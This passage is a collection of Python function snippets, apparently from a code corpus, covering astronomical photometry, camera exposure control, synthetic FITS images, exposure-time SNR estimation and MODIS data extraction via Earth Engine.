np.full_like(fulldata, np.nan),\n srcpos=(xctr, yctr), fitsize=wdw, fwhm=default_fwhm,\n profile=param['model'], aprad=psfr,\n skyrad=skyrad, stamp_center=False, allow_badfit=True)\n except PipeCalError as err:\n log.warning(' Bad fit.')\n log.warning(f' {err}')\n continue\n\n peak, xcent, ycent, ra, dec, xfwhm, yfwhm, ellip, \\\n pa, pw_law, final_sum, bg_avg, bg_std = [np.nan] * 13\n bg_fit = 0.0\n for pp in phot_par:\n if pp['key'] == 'STPEAK':\n peak = pp['value'][0]\n elif pp['key'] == 'STCENTX':\n xcent = pp['value'][0]\n elif pp['key'] == 'STCENTY':\n ycent = pp['value'][0]\n elif pp['key'] == 'STFWHMX':\n xfwhm = pp['value'][0]\n elif pp['key'] == 'STFWHMY':\n yfwhm = pp['value'][0]\n elif pp['key'] == 'STANGLE':\n pa = pp['value'][0]\n elif pp['key'] == 'STPWLAW':\n pw_law = pp['value'][0]\n elif pp['key'] == 'STAPFLX':\n final_sum = pp['value'][0]\n elif pp['key'] == 'STAPSKY' and do_bg:\n bg_avg = pp['value'][0]\n elif pp['key'] == 'STAPSSTD' and do_bg:\n bg_std = pp['value']\n elif pp['key'] == 'STBKG':\n bg_fit = pp['value'][0]\n\n # check whether source is already in table\n limit = 2. * default_fwhm\n present = (int(frame) == self.ptable['Frame']) \\\n & (np.abs(self.ptable['X'] - (xcent + 1)) < limit) \\\n & (np.abs(self.ptable['Y'] - (ycent + 1)) < limit)\n if np.any(present):\n log.info(' Source already measured.')\n continue\n\n # check whether source is unreasonably large or small\n badfit = False\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n mfwhm = gmean([xfwhm, yfwhm])\n if np.isnan(mfwhm) or mfwhm > 20 or mfwhm < 1.0:\n log.warning(' Bad fit.')\n log.warning(' Calculated FWHM: {:.2f} pixels'.format(mfwhm))\n badfit = True\n mfwhm = np.nan\n ellip = np.nan\n pa = np.nan\n else:\n # calculate ellipticity and fix PA\n if xfwhm >= yfwhm:\n ellip = 1 - yfwhm / xfwhm\n else:\n ellip = 1 - xfwhm / yfwhm\n if pa <= 0:\n pa += 90\n else:\n pa -= 90\n\n # track flux by radial distance\n if param['show_plots']:\n y, x = np.mgrid[:wdw, :wdw]\n r = np.sqrt((x - xcent + xstart) ** 2\n + (y - ycent + ystart) ** 2)\n if badfit:\n moddata = None\n else:\n # get the equivalent 1D model from the profile fit\n # for plotting\n if param['model'] == 'gaussian':\n eqw = mfwhm * stats.gaussian_fwhm_to_sigma\n rmodel = modeling.models.Gaussian1D(peak, 0.0, eqw)\n else:\n n_1 = 1 / pw_law\n eqw = mfwhm / (2 * np.sqrt(2 ** n_1 - 1))\n rmodel = modeling.models.Moffat1D(\n peak, 0.0, eqw, pw_law)\n rmodel += modeling.models.Const1D(bg_fit)\n moddata = rmodel(r)\n\n # data for matplotlib viewer: primary is model;\n # scatter data and h/v lines are overplots\n rflat = r.ravel()\n dflat = data.ravel()\n sortidx = np.argsort(rflat)\n xdata = rflat[sortidx]\n overplots = [{'plot_type': 'scatter',\n 'args': [rflat, dflat],\n 'kwargs': {'marker': '*',\n 'c': dflat,\n 'label': 'Flux data'}},\n {'plot_type': 'hline',\n 'args': [0.0],\n 'kwargs': {'linestyle': ':',\n 'linewidth': 1,\n 'color': 'lightgray'}}]\n if moddata is not None:\n ydata = moddata.ravel()[sortidx]\n overplots.append({'plot_type': 'vline',\n 'args': [mfwhm / 2.0],\n 'kwargs': {\n 'linestyle': ':',\n 'linewidth': 1,\n 'color': '#ff7f0e',\n 'label': 'Fit HWHM'}})\n overplots.append({'plot_type': 'vline',\n 'args': [mfwhm],\n 'kwargs': {\n 'linestyle': ':',\n 'linewidth': 1,\n 'color': '#d62728',\n 'label': 'Fit FWHM'}})\n else:\n ydata = np.full_like(xdata, np.nan)\n\n title = f'Frame {frame}, x={xcent:.0f} y={ycent:.0f}'\n overplots.append({'plot_type': 'legend',\n 'args': []})\n plot_data = {'args': [xdata, ydata],\n 'kwargs': {\n 'title': title,\n 'xlabel': 'Distance (pixels)',\n 'ylabel': 'Flux'},\n 'plot_kwargs': {\n 'linestyle': '-',\n 'color': 'gray',\n 'label': f\"{param['model'].title()} profile\"},\n 'overplot': overplots}\n self.radial_data.append(plot_data)\n\n # add DS9 start index back into centroid and convert to RA/Dec\n xcent += 1\n ycent += 1\n if hwcs is not None:\n try:\n radec = hwcs.wcs_pix2world([[xcent, ycent, 1]], 1)\n except ValueError:\n try:\n radec = hwcs.wcs_pix2world([[xcent, ycent]], 1)\n except ValueError:\n radec = np.array([[None, None]])\n else:\n radec = np.array([[None, None]])\n\n # set region\n b0 = 'point({:f} {:f}) # ' \\\n 'point=x ' \\\n 'color=green tag={{imexam}}'.format(xcent, ycent)\n self.run('regions', b0)\n b1 = 'circle({:f} {:f} {:f}) # ' \\\n 'color=green tag={{imexam}}'.format(xcent, ycent, psfr)\n self.run('regions', b1)\n if do_bg:\n b2 = 'annulus({:f} {:f} {:f} {:f}) # ' \\\n 'color=red ' \\\n 'tag={{imexam}}'.format(xcent, ycent,\n skyrad[0], skyrad[1])\n self.run('regions', b2)\n\n self.ptable.add_row([frame, peak, xcent, ycent,\n radec[0, 0], radec[0, 1],\n mfwhm, mfwhm * ps, ellip, pa,\n final_sum, bg_avg, bg_std])\n\n self.ptable.sort(['Frame', 'Peak'])\n print_str = '\\n'.join(\n self.ptable.pformat(max_lines=-1, max_width=-1))\n log.info(f'\\nResults:\\n{print_str}\\n')", "def fix_exposure(cam, slider, verbose=False):\n margin = 10\n exp_t = MAX_EXP / 2\n cam._set_exposure(exp_t * u.milliseconds)\n time.sleep(0.5)\n print(\"Fetching Frame\")\n im = cam.latest_frame()\n x_len = len(im)\n\n right, left = MAX_EXP, 0\n inc = right / 10\n for _ in range(10):\n ## Determine if Clipping or Low-Exposure ##\n gap = 255\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n continue\n else:\n gap = min(255 - max(im[i]), gap)\n\n ## Make Appropriate Adjustment ##\n if gap == 0:\n if verbose:\n print(\"Clipping at: \", exp_t)\n right = exp_t\n elif gap > 50:\n if verbose:\n print(\"Closing gap: \", gap, \" w/ exposure: \", exp_t)\n left = exp_t\n else:\n if verbose:\n print(\"Final Exposure: \", exp_t)\n return\n\n if inc < 0.01:\n exp_t -= inc if gap == 0 else -inc\n else:\n exp_t = (right + left) / 2\n inc = (right - left) / 10\n\n slider.set_val(exp_t)\n time.sleep(1)\n im = cam.latest_frame()", "def make_fake_image(header, output='direct.fits', background=None, exptime=1.e4, nexp=10):\n hdu = pyfits.HDUList()\n \n header['EXPTIME'] = exptime\n header['NEXP'] = nexp\n header['BUNIT'] = 'ELECTRONS/S'\n \n hdu.append(pyfits.PrimaryHDU(header=header))\n \n naxis = (header['NAXIS1'], header['NAXIS2'])\n \n for name, dtype in zip(['SCI', 'ERR', 'DQ'], \n [np.float32, np.float32, np.int32]):\n hdu.append(pyfits.ImageHDU(header=header, \n data=np.zeros(np.array(naxis).T, \n dtype=dtype), name=name))\n \n if background == None:\n background = header['BACKGR']\n \n header['BACKGR'] = background\n \n ### Simple error model of read noise and sky background\n var = nexp*header['READN'] + background*exptime\n \n ### electrons / s\n rms = np.sqrt(var)/exptime\n hdu['ERR'].data += rms\n hdu['SCI'].data = np.random.normal(size=np.array(naxis).T)*rms\n \n hdu.writeto(output, clobber=True, output_verify='fix')", "def set_exptime(self, exptime):\n exptime = u.Quantity(exptime, unit=u.s)\n if not np.isscalar(exptime):\n raise TypeError('Exposure time must be an integer, a float or an Astropy Unit object')\n if exptime.value <= 0:\n raise ValueError('Exposure time can not be zero or negative')\n self.exptime = exptime.value\n try:\n if self.cycle < self.exptime:\n warnings.warn('Exposure time ({:0.4f} seconds) higher than Cycle time ({:0.4f} seconds)'.\n format(self.exptime, self.cycle))\n except:\n pass", "def main():\n NAME = os.path.basename(__file__).split(\".\")[0]\n\n # Pass/fail thresholds\n MIN_AVG_FRAME_DELTA = 30 # at least 30ms delta between frames\n MAX_VAR_FRAME_DELTA = 0.01 # variance of frame deltas\n MAX_FRAME_DELTA_JITTER = 0.3 # max ms gap from the average frame delta\n\n with its.device.ItsSession() as cam:\n props = cam.get_camera_properties()\n if not its.caps.manual_sensor(props):\n print \"Test skipped\"\n return\n\n req, fmt = its.objects.get_fastest_manual_capture_settings(props)\n caps = cam.do_capture([req]*50, [fmt])\n\n # Print out the millisecond delta between the start of each exposure\n tstamps = [c['metadata']['android.sensor.timestamp'] for c in caps]\n deltas = [tstamps[i]-tstamps[i-1] for i in range(1,len(tstamps))]\n deltas_ms = [d/1000000.0 for d in deltas]\n avg = sum(deltas_ms) / len(deltas_ms)\n var = sum([d*d for d in deltas_ms]) / len(deltas_ms) - avg * avg\n range0 = min(deltas_ms) - avg\n range1 = max(deltas_ms) - avg\n print \"Average:\", avg\n print \"Variance:\", var\n print \"Jitter range:\", range0, \"to\", range1\n\n # Draw a plot.\n pylab.plot(range(len(deltas_ms)), deltas_ms)\n matplotlib.pyplot.savefig(\"%s_deltas.png\" % (NAME))\n\n # Test for pass/fail.\n assert(avg > MIN_AVG_FRAME_DELTA)\n assert(var < MAX_VAR_FRAME_DELTA)\n assert(abs(range0) < MAX_FRAME_DELTA_JITTER)\n assert(abs(range1) < MAX_FRAME_DELTA_JITTER)", "def determine_exposure_time(cn, bandlims, wantSNR = 10.0, wantetime = 5.0, ref_lam = 0.550,\n plot_snr_curves = False, plot_spectrum = False,\n title = \"\"):\n\n # Specify Kat's fiducial S/N\n iref = np.argmin(np.fabs(cn.lam - ref_lam))\n\n if bandlims is not None:\n\n # Specify band via wavelength\n icont = np.array([np.argmin(np.fabs(cn.lam - bandlims[0])), np.argmin(np.fabs(cn.lam - bandlims[1]))])\n iband = np.arange(icont[0]+1, icont[1])\n ibottom = np.argmin(np.fabs(cn.Cratio - np.min(cn.Cratio[iband])))\n\n # Calculate the continuum planet photon counts and contrast ratio\n ccont = cg.observe.interp_cont_over_band(cn.lam, cn.cp, icont, iband)\n ccrat = cg.observe.interp_cont_over_band(cn.lam, cn.Cratio, icont, iband)\n\n # Calculate varies SNRs as a function of exposure time\n Nt = 1000\n times = np.linspace(1.0, 100.0, Nt)\n band_snrs = np.zeros(len(times))\n bot_snrs = np.zeros(len(times))\n cont_snrs = np.zeros(len(times))\n fid_snrs = np.zeros(len(times))\n for i, time in enumerate(times):\n cn.make_fake_data(texp = times[i])\n fid_snrs[i] = cn.SNRt[iref]\n if bandlims is not None:\n band_snrs[i] = cg.observe.SNR_band(cn.cp, ccont, cn.cb, iband, itime=times[i])\n bot_snrs[i] = cn.SNRt[ibottom]\n cont_snrs[i] = np.mean(cn.SNRt[icont])\n\n # Fit for time to desired snr value\n etime_fid = find_time_from_snr(times, fid_snrs, wantSNR) #times[np.argmin(np.fabs(fid_snrs - wantSNR))]\n if bandlims is not None:\n etime_band = find_time_from_snr(times, band_snrs, wantSNR) #times[np.argmin(np.fabs(band_snrs - wantSNR))]\n etime_bot = find_time_from_snr(times, bot_snrs, wantSNR) #times[np.argmin(np.fabs(bot_snrs - wantSNR))]\n etime_cont = find_time_from_snr(times, cont_snrs, wantSNR) #times[np.argmin(np.fabs(cont_snrs - wantSNR))]\n\n # Check for incomplete bands which can cause anomalously low exposure times\n if bandlims is None:\n etime_band = np.nan\n etime_bot = np.nan\n etime_cont = np.nan\n else:\n if (False in np.isfinite(cn.Cobs[iband])):\n etime_band = np.nan\n\n # Make plot of SNR vs exposure time\n if plot_snr_curves:\n\n fig, ax = plt.subplots(figsize = (8,6))\n ax.set_xlabel(\"Exposure Time [hrs]\")\n ax.set_ylabel(\"S/N\")\n if bandlims is not None:\n ax.plot(times, band_snrs, label = \"detect band rel. to cont.\")\n ax.plot(times, bot_snrs, label = \"bottom of band\")\n ax.plot(times, cont_snrs, label = \"avg. continuum\")\n ax.plot(times, fid_snrs, label = \"at %.2f $\\mu$m\" %cn.lam[iref])\n if bandlims is not None:\n ax.scatter(etime_band, wantSNR, c=\"C0\")\n ax.scatter(etime_bot, wantSNR, c=\"C1\")\n ax.scatter(etime_cont, wantSNR, c=\"C2\")\n ax.scatter(etime_fid, wantSNR, c=\"C3\")\n ax.axhline(wantSNR, ls = \"--\", c = \"grey\")\n if bandlims is not None:\n ax.axvline(etime_band, ls = \"--\", c = \"C0\")\n ax.axvline(etime_bot, ls = \"--\", c = \"C1\")\n ax.axvline(etime_cont, ls = \"--\", c = \"C2\")\n ax.axvline(etime_fid, ls = \"--\", c = \"C3\")\n ylims = ax.get_ylim()\n if bandlims is not None:\n ax.text(etime_band, ylims[1]-.5*ylims[1], \"%.2f\" %etime_band, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C0\")\n ax.text(etime_bot, ylims[1]-.1*ylims[1], \"%.2f\" %etime_bot, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C1\")\n ax.text(etime_cont, ylims[1]-.15*ylims[1], \"%.2f\" %etime_cont, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C2\")\n ax.text(etime_fid, ylims[1]-.20*ylims[1], \"%.2f\" %etime_fid, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C3\")\n ax.legend(framealpha = 0.75, fontsize = 14)\n\n if plot_spectrum:\n\n # Construct noised spectrum plot\n if bandlims is not None:\n cn.make_fake_data(texp = etime_band)\n else:\n cn.make_fake_data(texp = etime_fid)\n\n fig, ax = plt.subplots(figsize = (8,6))\n ax.plot(cn.lam, cn.Cratio, ls = \"steps-mid\", color = \"grey\")\n ax.errorbar(cn.lam, cn.Cobs, yerr=cn.Csig, fmt = \"o\", ms = 2.0, alpha = 0.7, color = \"k\")\n ax.set_xlabel(\"Wavelength [$\\mu$m]\")\n ax.set_ylabel(\"Fp/Fs\")\n ax.set_title(title)\n\n if bandlims is not None:\n # Identify specific points in band\n for i in icont:\n ax.scatter(cn.lam[i], cn.Cratio[i], s = 20.0, c = \"C8\", marker = \"o\", zorder = 100)\n for i in iband:\n ax.scatter(cn.lam[i], cn.Cratio[i], s = 20.0, c = \"C1\", marker = \"o\", zorder = 100)\n ax.scatter(cn.lam[ibottom], cn.Cratio[ibottom], s = 20.0, c = \"C8\", marker = \"o\", zorder = 100)\n # Identify specific continuum points in band\n for i, ic in enumerate(iband):\n ax.scatter(cn.lam[ic], ccrat[i], s = 20.0, c = \"C9\", marker = \"o\", zorder = 100)\n\n # Return exposure times\n return etime_band, etime_bot, etime_cont, etime_fid", "def handle_command(log, writer, data):\n\n response = 'BAD: Invalid Command'\n commandList = data.split()\n\n try:\n if commandList[0] == 'expose':\n if len(commandList) == 3:\n if commandList[1] == 'light' or commandList[1] == 'dark' or commandList[1] == 'flat':\n expType = commandList[1]\n expTime = commandList[2]\n try:\n float(expTime)\n if float(expTime) > 0: \n expTime = float(expTime)\n fileName = exposure(expType, expTime)\n response = 'OK\\n'+'FILENAME = '+fileName\n else:\n response = 'BAD: Invalid Exposure Time'\n except ValueError:\n response = 'BAD: Invalid Exposure Time'\n elif len(commandList) == 2:\n if commandList[1] == 'bias':\n expType = commandList[1]\n try: \n fileName = exposure(expType, 0.0)\n response = 'OK\\n'+'FILENAME: '+fileName\n except ValueError:\n response = 'BAD: Invalid Exposure Time'\n elif commandList[0] == 'set':\n if len(commandList) >= 1:\n response = setParams(commandList[1:])\n except IndexError:\n response = 'BAD: Invalid Command'\n \n # tell the client the result of their command & log it\n #log.info('RESPONSE = '+response)\n #writer.write((response+'\\n---------------------------------------------------\\n').encode('utf-8'))\n writer.write((response+'\\nDONE\\n').encode('utf-8'))", "def write_file(req, file_type, download, dataset, stream, period, root_name):\n# ~~~~ Loading up the GRIB file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n head, _ = path.splitext(root_name)\n\n if file_type == 'grib':\n\n if download:\n raise TelemacException(\\\n '... I am not programmed to '\n 'download grib files directly.\\n\\n')\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nLoading essentials from the GRIB\\n')\n grb2slf = Grib(dataset, req, stream)\n\n grb2slf.set_geometry()\n\n if stream == 'spec':\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nSpecial case for spectral file\\n')\n grb2slf.put_geometry('geo_'+head+'.slf')\n grb2slf.set_spectral()\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nConverting grib file(s) into SELAFIN\\n')\n grb2slf.put_content(root_name)\n\n# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n# ~~~~ Downloading the NetCDF file ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Unfortunately, I did not manage to access the NetCDF file remotely\n elif file_type == 'netcdf':\n\n ecmwf2slf = Ecmwf(period, req)\n if download:\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nMaking an ECMWF request\\n')\n ecmwf2slf.connect_to_ecmwf(\"datasets/%s\" % (req['dataset']))\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nHaving to download the ECMWF file first\\n')\n ecmwf2slf.download_ecmwf()\n print(\" ~> download completed.\")\n\n ecmwf2slf.open_ecmwf()\n ecmwf2slf.set_geometry()\n\n if stream == 'spec':\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nSpecial case for spectral file\\n')\n ecmwf2slf.put_geometry('geo_'+head+'.slf')\n ecmwf2slf.set_spectral()\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nConverting netcdf file into SELAFIN\\n')\n ecmwf2slf.put_content(root_name, stream)", "def query_frame(self):\n x, y = N.ogrid[0:self._resolution[1], 0:self._resolution[0]]\n x0, y0 = int(self._resolution[1] / 2), int(self._resolution[0] / 2)\n r = N.hypot(x - x0, y - y0)\n w0 = 75.0\n self.frame = N.array(N.exp(-r ** 2 / w0 ** 2) * 60000, dtype=N.uint16)\n self.frame += N.random.uniform(low=0, high=5535, size=self._resolution[::-1])", "def configure_area_det_expo(exposure):\n det = xpd_configuration[\"area_det\"]\n yield from bps.abs_set(\n det.cam.acquire_time, glbl[\"frame_acq_time\"], wait=True\n )\n acq_time = det.cam.acquire_time.get()\n _check_mini_expo(exposure, acq_time)\n # compute number of frames\n num_frame = np.ceil(exposure / acq_time)\n yield from bps.abs_set(det.images_per_set, num_frame, wait=True)\n computed_exposure = num_frame * acq_time\n # print exposure time\n print(\n \"INFO: requested exposure time = {} - > computed exposure time\"\n \"= {}\".format(exposure, computed_exposure)\n )\n return num_frame, acq_time, computed_exposure", "def exposure(cls, *args):\n return cls.path_finder('exposure', *args)", "def exposure(cls, *args):\n return cls.path_finder('exposure', *args)", "def _generate_direct_image(self):\n filename = '0000_flt.fits'\n\n di_start_JD = (self.exp_start_times[0] - 1 * u.min).to(u.day)\n di_exp_gen = ExposureGenerator(self.detector, self.grism, self.NSAMP,\n self.SAMPSEQ, self.SUBARRAY,\n self.planet, filename, di_start_JD)\n\n try: # assume that its a list not a single value\n x_ref = self.x_ref[0]\n except TypeError:\n x_ref = self.x_ref\n\n try: # assume that its a list not a single value\n y_ref = self.y_ref[0]\n except TypeError:\n y_ref = self.y_ref\n\n exp = di_exp_gen.direct_image(x_ref, y_ref)\n exp.generate_fits(self.outdir, '0000_flt.fits')", "def send_jpg_frame_REP_watcher(self, text, image):\n\n ret_code, jpg_buffer = cv2.imencode(\n \".jpg\", image, [int(cv2.IMWRITE_JPEG_QUALITY),\n self.jpeg_quality])\n self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now\n try:\n hub_reply = self.sender.send_jpg(text, jpg_buffer)\n except: # add more specific exception, e.g. ZMQError, after testing\n print(\"Exception at sender.send_jpg in REP_watcher function.\")\n self. fix_comm_link()\n self.REP_recd_time.append(datetime.utcnow())\n return hub_reply", "def stream_frames(video_capture):", "def capture(self, channel: LC):\n\n # check if gain information is available, if not, update first\n if \"d2d\" not in self.config:\n self.setup_d2d()\n self.update()\n\n # turn on the light\n self.light_control(channel, 1)\n\n # assemble the terminal command\n path_to_bright = os.getcwd() + \"/cam/tmp/bright.bmp\"\n path_to_dark = os.getcwd() + \"/cam/tmp/dark.bmp\"\n gain = self.config[\"d2d\"][channel][\"analog-gain\"] * self.config[\"d2d\"][channel][\"digital-gain\"]\n\n photo_cmd = \"raspistill -e bmp -w {} -h {} -ss {} -t 1000 -awb off -awbg {},{} -ag {} -dg {}\".format(self.settings.resolution[0], self.settings.resolution[1], self.settings.shutter_speed[channel], self.config[\"wb\"][channel][\"r\"], self.config[\"wb\"][channel][\"b\"], self.config[\"d2d\"][channel][\"analog-gain\"], self.config[\"d2d\"][channel][\"digital-gain\"])\n\n # run command and take bright and dark picture\n # start the bright image capture by spawning a clean process and executing the command, then waiting for the q\n p = mp.Process(target=photo_worker, args=(photo_cmd + \" -o {}\".format(path_to_bright),))\n try:\n p.start()\n p.join()\n except OSError:\n d_print(\"Could not start child process, out of memory\", 3)\n return (None, 0)\n # turn off the light\n self.light_control(channel, 0)\n # start the dark image capture by spawning a clean process and executing the command, then waiting for the q\n p = mp.Process(target=photo_worker, args=(photo_cmd + \" -o {}\".format(path_to_dark),))\n try:\n p.start()\n p.join()\n except OSError:\n d_print(\"Could not start child process, out of memory\", 3)\n return (None, 0)\n\n # load the images from file, perform dark frame subtraction and return the array\n bright = Image.open(path_to_bright)\n rgb = np.array(bright)\n if channel != LC.GROWTH:\n dark = Image.open(path_to_dark)\n rgb = cv2.subtract(rgb, np.array(dark))\n\n # if the time since last update is larger than a day, update the gains after the photo\n if time.time() - self.config[\"d2d\"][\"timestamp\"] > 3600*24:\n self.update()\n\n return (rgb, gain)", "def write(self, command):\n self.meas.write(bytes(command, \"utf8\"))", "def object(s='object'):\n s = s.strip()[:80] #truncate to 80 char to fit in FITS header\n print camera.SetShutter(0)\n camera.status.imgtype = 'OBJECT'\n camera.status.object = s\n camera.status.update()", "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "def get_image(id, frame=\"ICRS\", survey=\"DSS\", cmap=\"gray\", fov=1.0):\n\n id = id\n frame = frame\n survey = survey\n cmap = cmap\n\n # instantiate target object\n tgt = Target(id=id, frame=frame, survey=survey)\n\n # resolve target name, if this fails, quit execution and return the error code\n code = tgt.resolve_name()\n if code != 0:\n return(1)\n \n # make hips2fits query to be placed in url\n query_params = {\n 'hips': tgt.survey,\n 'object': tgt.id,\n 'ra': tgt.coords.ra.value,\n 'dec': tgt.coords.dec.value,\n 'fov': (fov * u.deg).to(u.deg).value,\n 'width': 500,\n 'height': 500,\n }\n\n url = f'http://alasky.u-strasbg.fr/hips-image-services/hips2fits?{urlencode(query_params)}'\n try:\n # try grabbing the fits file and plotting it.\n hdu = fits.open(url)\n\n im = hdu[0].data\n\n fig = plt.figure()\n ax=plt.gca()\n ax.imshow(im, origin='lower', cmap=cmap)\n plt.title(f\"{tgt.main_id}: {tgt.survey}\")\n fig.savefig(\"fig.jpg\", dpi=200)\n return(0)\n except Exception as e:\n # if the above failed, print the error and quit\n print(e)\n return(1)", "def GEEviMODIS(ptsFile,metric,timeStep,buf,poly,QC, username,folderOut, scalePix = 250,startYear = None,endYear = None):\n \n # load required libraries\n import ee\n import math\n \n # Initialize the Earth Engine object, using the authentication credentials.\n ee.Initialize()\n\n ID_field = \"geeID\"\n\n #load pts or poly file\n pts1 = ee.FeatureCollection('users/' + username + '/' + str(ptsFile))\n \n #Computes the bits we need to extract.\n def getQABits(image, start, end, newName):\n pattern = 0\n listB = list(range(start, end+1))\n for one in listB:\n pattern += math.pow(2, one)\n pattern = int(pattern)\n \n return (image.select([0], [newName])\n .bitwiseAnd(pattern)\n .rightShift(start))\n\n time_d = {}\n time_d['lowest'] = 'rl'\n time_d['month'] = 'rm'\n time_d['year'] = 'ry'\n\n lastImage = ee.Image(ee.ImageCollection('MODIS/006/MOD13Q1')\n .sort('system:time_start',False)\n .first())\n lastImageDate = lastImage.get('system:index').getInfo()\n\n firstImage = ee.Image(ee.ImageCollection('MODIS/006/MOD13Q1')\n .sort('system:time_start',True)\n .first())\n firstImageDate = firstImage.get('system:index').getInfo()\n \n if all([startYear is None,endYear is None]):\n startYear = int(firstImageDate[0:4])\n endYear = int(lastImageDate[0:4])\n startMonth = int(firstImageDate[5:7])\n endMonth = int(lastImageDate[5:7])-1\n startYearAll = startYear + 1\n endYearAll = endYear - 1\n\n years = list(range(startYear, endYearAll + 1))\n monthsEE = ee.List(list(range(startMonth,(12*len(years)+endMonth))))\n yearsEE = ee.List(list(range(startYearAll, endYearAll + 1)))\n \n elif all([startYear >= 0,endYear >= 0]):\n startYearReal = int(firstImageDate[0:4])\n endYearReal = int(lastImageDate[0:4]) \n \n years = list(range(max(startYearReal,startYear), (min(endYearReal,endYear) + 1)))\n \n if endYear >= endYearReal:\n endMonth = int(lastImageDate[5:7])-1\n endYearReal2 = endYearReal-1\n years2 = len(years)-1\n elif endYear < endYearReal:\n endMonth = 0\n endYearReal2 = endYearReal\n years2 = len(years)\n \n if startYear <= startYearReal:\n startMonth = int(firstImageDate[5:7])\n startYearReal2 = startYearReal+1\n elif startYear > startYearReal:\n startMonth = 0\n startYearReal2 = startYearReal\n \n monthsEE = ee.List(list(range(startMonth,(12*years2+endMonth))))\n yearsEE = ee.List(list(range(max(startYearReal2,startYear), (min(endYearReal2,endYear) + 1))))\n \n for met in metric:\n modisVI = ee.ImageCollection('MODIS/006/MOD13Q1')\n metL = [met]\n def maskbyBits1(img):\n QA = img.select('DetailedQA')\n QA1 = getQABits(QA, 0, 1, 'QA')\n QA2 = getQABits(QA, 2, 5, 'QA')\n QA3 = getQABits(QA, 6, 7, 'QA')\n QA4 = getQABits(QA, 8, 8, 'QA')\n QA5 = getQABits(QA, 10, 10, 'QA')\n QA6 = getQABits(QA, 15, 15, 'QA')\n mask = QA1.lt(2).And(QA2.lt(12)).And(QA3.neq(3)).And(QA3.neq(0)).And(QA4.eq(0)).And(QA5.eq(0)).And(QA6.eq(0))\n return img.updateMask(mask)\n \n def maskbyBits2(img):\n QA = img.select('DetailedQA')\n QA1 = getQABits(QA, 0, 1, 'QA')\n mask = QA1.eq(0)\n return img.updateMask(mask)\n \n if QC == 'None':\n modisVIn = modisVI.select(met)\n elif QC == 'Op1':\n modisVIn = modisVI.map(maskbyBits1).select(met)\n elif QC == 'Op2': \n modisVIn = modisVI.map(maskbyBits2).select(met)\n\n def scale1(img):\n return (img.select(metL[0])\n .float()\n .multiply(0.0001)\n .copyProperties(img,['system:time_start','system:time_end']))\n\n if timeStep == 'year':\n\n def map_m(i):\n i = ee.Number(i).int()\n image2 = (modisVIn\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .first())\n filtered = (modisVIn\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col1 = ee.ImageCollection(yearsEE.map(map_m).flatten())\n\n elif timeStep == 'month':\n \n def map_m(i):\n i = ee.Number(i)\n y = i.divide(12).add(years[0]).int()\n m = i.mod(12).add(1)\n image2 = (modisVIn\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .first())\n filtered = (modisVIn\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col1 = ee.ImageCollection(monthsEE.map(map_m).flatten())\n \n elif all([timeStep == 'lowest',endYear is None, startYear is None]):\n\n img_col1 = modisVIn\n \n elif all([timeStep == 'lowest',endYear > 0, startYear > 0]):\n\n img_col1 = modisVIn.filter(ee.Filter.calendarRange(startYear, endYear, 'year'))\n\n #else:\n #print(\"incorrect time step specified\")\n \n img_col = img_col1.map(scale1)\n \n if buf > 0:\n bufL = [buf]\n def bufferPoly(feature):\n return feature.buffer(bufL[0])\n\n ptsB = pts1.map(bufferPoly)\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = ptsB.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = 